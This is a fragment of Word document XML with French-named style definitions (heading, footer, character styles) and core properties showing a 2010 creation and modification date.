    <w:rsid w:val="0017592F"/>
    <w:rsid w:val="001F54B9"/>
    <w:rsid w:val="00285D15"/>
    <w:rsid w:val="00325188"/>
    <w:rsid w:val="003F3DF4"/>
    <w:rsid w:val="003F40DE"/>
    <w:rsid w:val="00426311"/>
    <w:rsid w:val="00484243"/>
    <w:rsid w:val="004C3CE7"/>
    <w:rsid w:val="00502F7F"/>
    <w:rsid w:val="00664FCA"/>
    <w:rsid w:val="006842D1"/>
    <w:rsid w:val="0076086E"/>
    <w:rsid w:val="00880020"/>
    <w:rsid w:val="00905F46"/>
    <w:rsid w:val="009E6A77"/>
    <w:rsid w:val="00A4512D"/>
    <w:rsid w:val="00B51A32"/>
    <w:rsid w:val="00B51CF8"/>
    <w:rsid w:val="00B5798E"/>
    <w:rsid w:val="00BE6554"/>
    <w:rsid w:val="00C971DE"/>
    <w:rsid w:val="00E27044"/>
    <w:rsid w:val="00E40003"/>
    <w:rsid w:val="00E630CC"/>
    <w:rsid w:val="00E669ED"/>
    <w:rsid w:val="00EC02A0"/>
    <w:rsid w:val="00FA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ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003F4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4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40D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0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40DE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F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0DE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003F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611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11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117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7592F"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mediumtext">
    <w:name w:val="medium_text"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001F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FEC6-D5FA-4AF2-AC7B-B5DBDBE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Mana</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <cp:lastPrinted>2010-05-30T14:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-25T21:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-05-30T14:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>